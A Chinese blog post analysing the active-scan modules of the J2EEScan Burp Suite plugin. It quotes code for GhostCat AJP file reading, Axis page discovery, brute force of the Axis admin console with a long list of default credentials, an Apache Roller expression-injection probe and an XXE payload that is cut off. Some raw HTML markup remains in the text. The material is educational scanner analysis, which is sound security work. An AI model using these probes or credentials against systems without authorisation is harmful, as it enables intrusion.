-
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(1-10)
前言
插件开发学习第6套。前置文章:
【BurpSuite】插件开发学习之Log4shell
【BurpSuite】插件开发学习之Software Vulnerability Scanner
【BurpSuite】插件开发学习之dotnet-Beautifier
【BurpSuite】插件开发学习之active-scan-plus-plus
【BurpSuite】插件开发学习之J2EEScan(上)-被动扫描上一章讲的是重写了doPassiveScan,这里讲重写doActiveScan
doActiveScan
直接从package里取class
j2eeTests = getClassNamesFromPackage("burp.j2ee.issues.impl.");- 1
再取每个类里面的scan方法
for (Method m : j2eeModule.getClass().getMethods()) { if (m.getName().equals("scan")) {- 1
- 2
根据scan函数的注解
RunOnlyOnce annotationRunOnlyOnce = m.getAnnotation(RunOnlyOnce.class); try { // log the plugin is executed once pluginExecutedOnce(module, host, port);- 1
- 2
- 3
- 4
- 5
- 6
- 7
记录下什么漏洞只需要攻击一次,写入数据库
public void pluginExecutedOnce(String pluginClass, String host, int port) throws SQLException { PreparedStatement stmt = conn.prepareStatement("INSERT INTO executed_plugins VALUES(?,?,?)"); stmt.setString(1, pluginClass); stmt.setString(2, host); stmt.setInt(3, port); stmt.executeUpdate(); }- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
否则就是所有的目标都可以scan
逻辑讲完了,现在可以看看具体的package里面有哪些漏洞了,一共73个,一个一个来
73个impl里面可能有好几种类型的漏洞,放在一篇里面比较重,所以每10个为一个单位,拆分发布吧。【1】AJP Tomcat GhostCat(webapp目录文件读取) - CVE-2020-1938
- RunOnlyOnce
- https://github.com/threedr3am/learnjavabug/tree/master/tomcat/ajp-bug/src/main/java/com/threedr3am/bug/tomcat/ajp
- 原理: https://zhuanlan.zhihu.com/p/137527937
先连接默认端口
ac.connect(host, DEFAULT_AJP_PORT); int DEFAULT_AJP_PORT = 8009;- 1
- 2
然后构造ajp请求包发送
TesterAjpMessage forwardMessage = ac.createForwardMessage(uri); forwardMessage.addAttribute("javax.servlet.include.request_uri", "1"); forwardMessage.addAttribute("javax.servlet.include.path_info", WEBINF_PATH); forwardMessage.addAttribute("javax.servlet.include.servlet_path", ""); forwardMessage.end(); ac.sendMessage(forwardMessage);- 1
- 2
- 3
- 4
- 5
- 6
- 7
其中比较关键的是参数:javax.servlet.include.path_info,value是
List<String> WEBINF_PATHS = Arrays.asList( "/" + contextPath + "/WEB-INF/web.xml", "WEB-INF/web.xml" );- 1
- 2
- 3
- 4
然后根据ajp返回的rsp去匹配(包含关系):
也就是根绝我们读取的WEBINF_PATHS的内容。private static final byte[] GREP_STRING = "- 1
- 2
如果存在则说明存在文件读取漏洞。
【2】AJPDetector
This module detects Apache JServ Protocol (AJP) services
实际上就是检测有没有开启的AJPfuzz的port列表
private static final int[] AJP13PORTS = {8080, 8102, 8081, 6800, 6802, 8009, 8109, 8209, 8309, 8888, 9999};- 1
建立socket连接,发送心跳包,判断返回包
String system = host.concat(Integer.toString(port)); byte[] CPing = new byte[]{ (byte) 0x12, (byte) 0x34, (byte) 0x00, (byte) 0x01, (byte) 0x0a}; if (CPong != null && getHex(CPong).equalsIgnoreCase("414200010900000000")) {- 1
- 2
- 3
- 4
- 5
这个应该是可以和【1】结合,这里如果判断有心跳包,就直接测试文件包含。
【3】ApacheAxis
【3】HAPPY_AXIS_PATHS(Axis测试页面泄露)
先遍历PATH
private static final List<String> HAPPY_AXIS_PATHS = Arrays.asList( "/dswsbobje/happyaxis.jsp", // SAP BusinessObjects path "/dswsbobje//happyaxis.jsp", // SAP BusinessObjects path "/jboss-net/happyaxis.jsp", // JBoss "/jboss-net//happyaxis.jsp", // JBoss "/happyaxis.jsp", "/axis2/axis2-web/HappyAxis.jsp", "/axis2-web//HappyAxis.jsp", "/axis//happyaxis.jsp", "/axis2//axis2-web/HappyAxis.jsp", "/wssgs/happyaxis.jsp", //JBuilder Apache Axis Admin Console "/tresearch/happyaxis.jsp" );- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
然后根据返回包match
private static final byte[] GREP_STRING_HAPPY_AXIS = "Happiness Page".getBytes();- 1
【4】AXIS_PATHS(Axis管理后台泄露)
遍历
private static final List<String> AXIS_PATHS = Arrays.asList( "/axis2/", "/axis/", "/dswsbobje/", // SAP BusinessObjects path "/jboss-net/", // JBoss "/tomcat/axis/", "/wssgs/", //JBuilder Apache Axis Admin Console
..Apache-Axis "/tresearch/", // JBuilder Apache Axis Admin Console "/" );- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
这些根目录加上admin目录请求
private static final String AXIS_ADMIN_PATH = "/axis2-admin/";- 1
如果match到
private static final byte[] GREP_STRING_AXIS_ADMIN = "Login to Axis2 :: Administration"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <div class="hljs-button signin" data-title="登录后复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style=""><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li></ul></pre> <p>则找到管理后台</p> <h6><a id="5weakpasswordAxis_161"></a>【5】weakpassword(Axis管理后台弱口令)</h6> <p>如果找到后台,还可以进行账号密码爆破<br> 常见的密码</p> <pre data-index="15" class="set-code-show prettyprint"><code class="prism language-java has-numbering" onclick="mdcp.signin(event)" style="position: unset;"> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"tomcat"</span><span class="token punctuation">,</span> <span class="token string">"tomcat"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"tomcat"</span><span class="token punctuation">,</span> <span class="token string">"manager"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"tomcat"</span><span class="token punctuation">,</span> <span class="token string">"jboss"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"tomcat"</span><span class="token punctuation">,</span> <span class="token string">"password"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"tomcat"</span><span class="token punctuation">,</span> <span class="token string">""</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"both"</span><span class="token punctuation">,</span> <span class="token string">"manager"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"both"</span><span class="token punctuation">,</span> <span class="token string">"tomcat"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"admin"</span><span class="token punctuation">,</span> <span class="token string">"password"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"admin"</span><span class="token punctuation">,</span> <span class="token string">"tomcat"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"admin"</span><span class="token punctuation">,</span> <span class="token string">"manager"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"manager"</span><span class="token punctuation">,</span> <span class="token string">"manager"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"manager"</span><span class="token punctuation">,</span> <span class="token string">"tomcat"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"role1"</span><span class="token punctuation">,</span> <span class="token string">"role1"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"role1"</span><span class="token punctuation">,</span> <span class="token string">"tomcat"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"role"</span><span class="token punctuation">,</span> <span class="token string">"changethis"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"root"</span><span class="token punctuation">,</span> <span class="token string">"changethis"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"tomcat"</span><span class="token punctuation">,</span> <span class="token string">"changethis"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"admin"</span><span class="token punctuation">,</span> <span class="token string">"j5Brn9"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">// Sun Solaris </span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"admin"</span><span class="token punctuation">,</span> <span class="token string">"admin"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"admin"</span><span class="token punctuation">,</span> <span class="token string">"root"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"admin"</span><span class="token punctuation">,</span> <span class="token string">"password"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"admin"</span><span class="token punctuation">,</span> <span class="token string">""</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"admin"</span><span class="token punctuation">,</span> <span class="token string">"1234"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"admin"</span><span class="token punctuation">,</span> <span class="token string">"axis2"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"test"</span><span class="token punctuation">,</span> <span class="token string">"test"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"monitor"</span><span class="token punctuation">,</span> <span class="token string">"monitor"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"guest"</span><span class="token punctuation">,</span> <span class="token string">"guest"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"root"</span><span class="token punctuation">,</span> <span class="token string">""</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"root"</span><span class="token punctuation">,</span> <span class="token string">"root"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"root"</span><span class="token punctuation">,</span> <span class="token string">"admin"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"root"</span><span class="token punctuation">,</span> <span class="token string">"password"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"weblogic"</span><span class="token punctuation">,</span> <span class="token string">"weblogic"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"weblogic"</span><span class="token punctuation">,</span> <span class="token string">"weblogic1"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"weblogic"</span><span class="token punctuation">,</span> <span class="token string">"weblogic01"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"weblogic"</span><span class="token punctuation">,</span> <span class="token string">"welcome1"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"admin"</span><span class="token punctuation">,</span> <span class="token string">"security"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"oracle"</span><span class="token punctuation">,</span> <span class="token string">"oracle"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"system"</span><span class="token punctuation">,</span> <span class="token string">"security"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"system"</span><span class="token punctuation">,</span> <span class="token string">"password"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"wlcsystem"</span><span class="token punctuation">,</span> <span class="token string">"wlcsystem"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"wlpisystem"</span><span class="token punctuation">,</span> <span class="token string">"wlpisystem"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">// Orbeon forms</span> credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"orbeonadmin"</span><span class="token punctuation">,</span> <span class="token string">"xforms"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <div class="hljs-button signin" data-title="登录后复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style=""><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li><li style="color: rgb(153, 153, 153);">5</li><li style="color: rgb(153, 153, 153);">6</li><li style="color: rgb(153, 153, 153);">7</li><li style="color: rgb(153, 153, 153);">8</li><li style="color: rgb(153, 153, 153);">9</li><li style="color: rgb(153, 153, 153);">10</li><li style="color: rgb(153, 153, 153);">11</li><li style="color: rgb(153, 153, 153);">12</li><li style="color: rgb(153, 153, 153);">13</li><li style="color: rgb(153, 153, 153);">14</li><li style="color: rgb(153, 153, 153);">15</li><li style="color: rgb(153, 153, 153);">16</li><li style="color: rgb(153, 153, 153);">17</li><li style="color: rgb(153, 153, 153);">18</li><li style="color: rgb(153, 153, 153);">19</li><li style="color: rgb(153, 153, 153);">20</li><li style="color: rgb(153, 153, 153);">21</li><li style="color: rgb(153, 153, 153);">22</li><li style="color: rgb(153, 153, 153);">23</li><li style="color: rgb(153, 153, 153);">24</li><li style="color: rgb(153, 153, 153);">25</li><li style="color: rgb(153, 153, 153);">26</li><li style="color: rgb(153, 153, 153);">27</li><li style="color: rgb(153, 153, 153);">28</li><li style="color: rgb(153, 153, 153);">29</li><li style="color: rgb(153, 153, 153);">30</li><li style="color: rgb(153, 153, 153);">31</li><li style="color: rgb(153, 153, 153);">32</li><li style="color: rgb(153, 153, 153);">33</li><li style="color: rgb(153, 153, 153);">34</li><li style="color: rgb(153, 153, 153);">35</li><li style="color: rgb(153, 153, 153);">36</li><li style="color: rgb(153, 153, 153);">37</li><li style="color: rgb(153, 153, 153);">38</li><li style="color: rgb(153, 153, 153);">39</li><li style="color: rgb(153, 153, 153);">40</li><li style="color: rgb(153, 153, 153);">41</li><li style="color: rgb(153, 153, 153);">42</li><li style="color: rgb(153, 153, 153);">43</li><li style="color: rgb(153, 153, 153);">44</li></ul></pre> <p>再加上一个</p> <pre data-index="16" class="set-code-show prettyprint"><code class="prism language-java has-numbering" onclick="mdcp.signin(event)" style="position: unset;"> listOfPwd<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token string">"axis2"</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <div class="hljs-button signin" data-title="登录后复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style=""><li style="color: rgb(153, 153, 153);">1</li></ul></pre> <p>用户名就是爆破的admin</p> <p>如果match到</p> <pre data-index="17" class="set-code-show prettyprint"><code class="prism language-java has-numbering" onclick="mdcp.signin(event)" style="position: unset;"> <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span> GREP_STRING_AXIS_ADMIN_WEAK_PWD <span class="token operator">=</span> <span class="token string">"You are now logged into the Axis2 administration console"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <div class="hljs-button signin" data-title="登录后复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style=""><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li></ul></pre> <p>则认为是爆破成功</p> <h6><a id="6AXIS_SERVICES_PATHSAxis_225"></a>【6】AXIS_SERVICES_PATHS(Axis测试页面泄露)</h6> <p>和上面的AXIS_PATHS拼接</p> <pre data-index="18" class="set-code-show prettyprint"><code class="prism language-java has-numbering" onclick="mdcp.signin(event)" style="position: unset;"> <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> AXIS_SERVICES_PATHS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span> <span class="token string">"/services/listServices"</span><span class="token punctuation">,</span> <span class="token string">"/services/"</span> <span class="token punctuation">)</span><span class="token punctuation">;</span> <div class="hljs-button signin" data-title="登录后复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style=""><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li></ul></pre> <p>如果match到</p> <pre data-index="19" class="set-code-show prettyprint"><code class="prism language-java has-numbering" onclick="mdcp.signin(event)" style="position: unset;"> <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token operator"><</span><span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token operator">></span> GREP_STRINGS_AXIS_SERVICE_PAGE <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span> <span class="token string">"<title>Axis2: Services ".getBytes(), "List Services ".getBytes() );- 1
- 2
- 3
- 4
则认为获取到了Service列表
【7】ApacheRollerOGNLInjection(表达式注入)-CVE-2013-4212
表达式注入
String EL_INJECTION_TEST = String.format("${%d*%d}", firstInt, secondInt);- 1
攻击入口是登录页 url存在
if (curURL.getPath().contains("login.rol"))- 1
去除所有参数
for (IParameter param : parameters) { rawrequest = callbacks.getHelpers().removeParameter(rawrequest, param); }- 1
- 2
- 3
新增攻击参数
rawrequest = callbacks.getHelpers().addParameter(rawrequest, callbacks.getHelpers().buildParameter("pageTitle", EL_INJECTION_TEST, IParameter.PARAM_URL) );- 1
- 2
- 3
如果从返回包中Match到上面的计算结果,则认为表达式注入成功。
【8】ApacheSolrXXE - CVE-2017-12629
String xxesolr = "{!xmlparser v=''}";- 1
